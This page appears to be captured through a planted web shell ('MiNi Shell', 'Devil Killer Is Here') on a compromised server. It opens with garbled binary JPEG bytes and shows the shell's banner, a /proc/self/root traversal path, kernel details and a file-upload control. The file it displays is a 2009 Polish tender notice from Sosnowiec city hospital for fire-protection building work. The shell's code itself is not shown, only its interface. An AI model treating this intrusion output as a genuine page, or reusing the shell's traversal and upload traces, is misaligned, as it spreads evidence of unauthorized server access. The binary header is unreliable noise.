JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090423/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090423/117708-N-2009.html

<p class="kh_header"><b>Sosnowiec: DOSTOSOWANIE BUDYNKÓW SZPITALNYCH W ZAKRESIE OCHRONY PRZECIWPOŻAROWEJ - WYKONANIE DECYZJI KOMENDANTA MIEJSKIEGO PSP. WYKONANIE I i II ETAPU ZABEZPIECZENIA PRZECIWPOŻAROWEGO DLA BUDYNKÓW SZPITALNYCH PRZY UL. ZEGADŁOWICZA 3 (DOT. I ETAPU TJ. PRZEBUDOWA WEWNĘTRZNYCH DRÓG POŻAROWYCH W CELU DOSTOSOWANIA DO PRZEPISÓW P.POŻ. NA TERENIE SZPITALA MIEJSKIEGO W SOSNOWCU PRZY UL. ZEGADŁOWICZA 3)</b><br>
<b>Numer ogłoszenia: 117708 - 2009; data zamieszczenia: 23.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zespół Zakładów Opieki Zdrowotnej Szpital Miejski w Sosnowcu , ul. Szpitalna 1, 41-219 Sosnowiec, woj. śląskie, tel. 0-32 2964219, 3630479, faks 0-32 2964219.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.sosnowiec.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTOSOWANIE BUDYNKÓW SZPITALNYCH W ZAKRESIE OCHRONY PRZECIWPOŻAROWEJ - WYKONANIE DECYZJI KOMENDANTA MIEJSKIEGO PSP. WYKONANIE I i II ETAPU ZABEZPIECZENIA PRZECIWPOŻAROWEGO DLA BUDYNKÓW SZPITALNYCH PRZY UL. ZEGADŁOWICZA 3 (DOT. I ETAPU TJ. PRZEBUDOWA WEWNĘTRZNYCH DRÓG POŻAROWYCH W CELU DOSTOSOWANIA DO PRZEPISÓW P.POŻ. NA TERENIE SZPITALA MIEJSKIEGO W SOSNOWCU PRZY UL. ZEGADŁOWICZA 3).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty remontowo-budowlane w zakresie dostosowania wewnętrznych dróg ewakuacyjnych do wymogów przeciwpożarowych (system oddzieleń p.poż.) oraz wykonanie systemu instalacji oddymiania w obiekcie SP ZZOZ Szpital Miejski w Sosnowcu, usytuowanym przy ul. Zegadłowicza 3.

Zakres zadania obejmuje:

1. Wykonanie systemu oddzieleń przeciwpożarowych
1.1.	Na przedmiot zamówienia składają się  roboty budowlane i instalacyjne wyszczególnione poniżej:
CPV 45215000-7 - Roboty budowlane w zakresie budowy obiektów budowlanych opieki zdrowotnej i społecznej, krematoriów oraz obiektów użyteczności publicznej
CPV 45410000-4 - Tynkowanie
CPV 45453100-8 - Roboty renowacyjne
CPV 45450000-6 - Roboty budowlane wykończeniowe, pozostałe
CPV 45421152-4 - Instalowanie ścianek działowych
CPV 45421160-3 - Instalowanie wyrobów metalowych
CPV 45421132-8 - Instalowanie okien
CPV 45421131-1 - Instalowanie drzwi

2. Wykonanie systemu oddymiania
2.1. Na przedmiot zamówienia składają się  roboty budowlane i instalacyjne wyszczególnione poniżej:
CPV 45300000-0 - Roboty instalacyjne w budynkach
CPV 45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych
CPV 45312100-8 - Instalowanie przeciwpożarowych systemów alarmowych
CPV 45215140-0 - Roboty budowlane w zakresie obiektów szpitalnych 
CPV 45421132-8 - Instalowanie okien.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 90.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1. W przedmiotowym postępowaniu Zamawiający wymaga wniesienia wadium w kwocie:10 000,00 zł
2. Termin wniesienia wadium upływa w dniu w dniu składania ofert o godz. 10:00.
3.  Wadium może być wniesione  w jednej z form: 
a)pieniądz: w przypadku wniesienia wadium w formie pieniężnej wpłaty należy dokonać przelewem na rachunek: Bank PKO BP S.A. o/Sosnowiec, numer konta:  59 1020 2498 0000 8402 0025 7089. Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym. Za termin wniesienia wadium przyjmuje się datę uznania rachunku bankowego Zamawiającego.Wadium należy oznaczyć: Wadium do przetargu na dostosowanie wewnętrznych dróg ewakuacyjnych do wymogów p.poż. oraz wykonanie systemu instalacji oddymiania. Numer sprawy ZP/31/2009.
b)poręczenie bankowe lub poręczenie spółdzielczej oszczędnościowo - kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c)gwarancje bankowe;
d)gwarancje ubezpieczeniowe;
e)poręczenia udzielane przez podmioty, o których mowa w art. 6b ust. 5 pkt  2 ustawy z dnia 9 listopada 2000r o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 z późn. zm.)
4. Miejsce wniesienia wadium w formie ww. poręczeń i gwarancji to kasa Samodzielnego Publicznego Zespołu Zakładów Opieki Zdrowotnej Szpital Miejski w Sosnowcu, ul. Szpitalna 1, 41-219 Sosnowiec, parter. Zaleca się aby  kserokopia gwarancji lub poręczenia  była dołączona do oferty.
5. Oferta nie zabezpieczona wadium w wymaganej formie zostanie odrzucona. 
6. Warunki zwrotu lub zatrzymania wadium przez Zamawiającego określa art. 46 Prawa zamówień publicznych:
6.1 Zamawiający dokona niezwłocznie  zwrotu wadium jeżeli:
a)upłynie termin związania ofertą (składający ofertę będzie nią związany w terminie do 30 dni od daty składania ofert);
 b) nastąpi  zawarcie umowy; 
 c) Zamawiający unieważni postępowanie. 
 6.2 Zamawiający zwróci wadium na wniosek Wykonawcy:
a)który  wycofał ofertę przed terminem składania ofert;
b)który został wykluczony z postępowania;
c)którego oferta została odrzucona.
6.3 Zamawiający zatrzyma wadium jeżeli Wykonawca, którego oferta została wybrana:
a)odmówił podpisania  umowy na warunkach określonych w ofercie;
b)nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
c)zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy;
6.4 Zamawiający zatrzymuje wadium jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, nie złożył dokumentów lub oświadczeń lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie. 
6.5  Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwróci je zgodnie z zasadami określonymi w art. 46 ust. 4  ustawy Prawa zamówień publicznych. 
7.  W formularzu oferty należy podać numer konta, na jakie Zamawiający ma dokonać zwrotu wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.O udzielenie zamówienia mogą ubiegać się Wykonawcy którzy:
a.posiadają uprawnienie do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
b.posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.
Zamawiający wymaga, aby Wykonawca wykonał w okresie  ostatnich 5 lat przed dniem wszczęcia  postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy  - w tym okresie roboty budowlane odpowiadające swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem opisu wykonanych robót wraz z ich zakresem, wartości brutto zrealizowanych robót, terminu rozpoczęcia i zakończenia realizacji robót, miejsca wykonania robót, nazwą, adresem  Zamawiającego oraz załączenia dokumentów potwierdzających, że roboty te zostały wykonane należycie tj.: 
Poprzez wartość oraz rodzaj odpowiadające przedmiotowi zamówienia rozumie się realizację nie więcej niż trzech zamówień polegających na dostosowaniu budynków użyteczności publicznej w zakresie ochrony p.poż o łącznej wartości brutto min. 600 000,00 zł.
Poprzez budynki użyteczności publicznej Zamawiający rozumie m.in.: budynki wyższych uczelni, szkół, przedszkoli, ośrodki kulturalne, ośrodki wypoczynkowe, szpitale, hotele, placówki banków.
c.znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
Zamawiający wymaga, aby Wykonawca był ubezpieczony od odpowiedzialności cywilnej deliktowej w zakresie prowadzonej działalności gospodarczej na kwotę o wartości minimum 200 000,00 zł.
d.nie podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego.
 
2. Spełnienie przez Wykonawcę warunków udziału w postępowaniu, Zamawiający będzie oceniał na podstawie dokumentów i oświadczeń zawartych w ofercie, przy zastosowaniu zasady spełnia/nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. W celu potwierdzenia, że Wykonawcy posiadają uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlegają wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004r. - Prawo zamówień publicznych, należy przedłożyć następujące dokumenty:
1.1  Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
1.2 Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz z właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem  zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
1.3  złożyć oświadczenie według załącznika nr 2 do SIWZ.
- Dla Wykonawców mających siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej stosuje się odpowiednio § 2 rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006r. w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od wykonawcy oraz form w jakich te dokumenty mogą być składane (Dz. U. z 2006r. Nr 87, poz. 605).
2. W celu potwierdzenia, że Wykonawcy posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia należy:
2.1  przedłożyć wykaz wykonanych robót przez Wykonawcę w okresie ostatnich 5 lat  przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,  odpowiadające swoim rodzajem i  wartością  przedmiotowi zamówienia tj.:
- nie więcej niż trzy roboty budowlane polegające na dostosowaniu budynków użyteczności publicznej w zakresie ochrony p.poż. o łącznej wartości brutto nie mniejszej niż 600 000,00 zł. 
W wykazie należy  podać opis wykonanych robót wraz z ich zakresem, wartość brutto zrealizowanych robót, termin rozpoczęcia i zakończenia realizacji robót, miejsce wykonania robót, nazwę, adres Zamawiającego wraz z dołączonymi dokumentami, potwierdzającymi należyte wykonanie  wymienionych robót (według załącznika nr 4 do SIWZ ).
2.2 przedłożyć wykaz osób, które będą pełnić funkcje kierownicze odpowiedzialnych za realizację zamówienia (według załącznika nr 5 do SIWZ ) wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia.
2.3  przedłożyć uprawnienia dla osób, które będą pełnić funkcje kierownicze:
- uprawnienia ogólnobudowlane i  instalacyjne - elektryczne.

2.4  przedłożyć zaświadczenia z właściwej izby samorządu zawodowego dla osób, które będą pełnić funkcje kierownicze, potwierdzające przynależność do izby oraz posiadanie aktualnego, wymaganego ubezpieczenia od odpowiedzialności cywilnej.
2.5 złożyć oświadczenie według załącznika nr 2 do SIWZ.

3. W celu potwierdzenia, że Wykonawcy znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia należy: 
3.1 przedłożyć polisę lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej deliktowej w zakresie prowadzonej działalności gospodarczej, na kwotę o wartości minimum 200 000,00 zł.
3.2 złożyć oświadczenie według załącznika nr 2 do SIWZ..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.szpital.sosnowiec.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SP ZZOZ Szpital Miejski w Sosnowcu, 41-219 Sosnowiec, ul. Szpitalna 1 - Dział Zamówień Publicznych. W przypadku przekazania SIWZ w formie papierowej opłata za specyfikację wynosi 30 zł za zal. pocztow.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.05.2009 godzina 10:00, miejsce: Samodzielny Publiczny Zespół Zakładów Opieki Zdrowotnej Szpital Miejski w Sosnowcu, 41-219 Sosnowiec, ul. Szpitalna 1 - sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com